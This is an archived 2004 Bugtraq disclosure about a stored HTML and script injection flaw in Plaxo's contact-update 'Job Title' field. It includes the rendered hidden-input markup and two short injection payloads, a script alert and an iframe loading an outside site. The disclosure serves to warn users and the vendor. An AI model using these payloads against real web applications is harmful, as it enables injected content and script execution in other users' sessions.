[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200403121752.i2CHqK8A028679__19923.0955601253$1079117006@web187.megawebservers.com>
Date: Fri, 12 Mar 2004 17:52:20 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Cc: <NTBugtraq@...tserv.ntbugtraq.com>
Subject: PLAXO: is that a cure or a disease?
Friday, March 12, 2004
Having a firm belief in unnecessary gadgetry, we recently sent
our most senior colleague Liu Die Yu a request to update his
contact information via our plaxo device
[http://www.plaxo.com/]. Checking back several hours later in
our plaxo web account we eagerly selected his "card" to see what
that update might be.
BANG !
<input type="hidden" name="SetReplied" value="">
<input type="hidden" name="perm" value="1">
<input type="hidden" name="saveChanges" value="1">
<input type="hidden" name="close" value="0">
<input type="hidden" name="Biz.FullName" value="fatcat">
<input type="hidden" name="Biz.Title" value=""><iframe
src=http://www.bloatedcorp.com>">
<input type="hidden" name="Biz.Email1"
value="fatcat@...atedcorp.com">
<input type="hidden" name="Biz.Email2" value="">
<input type="hidden" name="Biz.Email3" value="">
<input type="hidden" name="Biz.IM" value="">
<input type="hidden" name="Biz.WebPage" value="">
He had taken our entire contact list for a joyride supreme.
Trivial arbitrary code injection into the plaxo user web
account. While it does a good job of attempting to defeat this,
simple input in the recipient request for update field of "JOB
TITLE", gives a real jobbing:
"><SCRIPT>alert('boop')</SCRIPT>
"><iframe src=http://www.bloatedcorp.com>
Needless to say should you receive one of these irritating
little requests, you'll now know what to do.
End Call
--
http://www.malware.com
Powered by blists - more mailing lists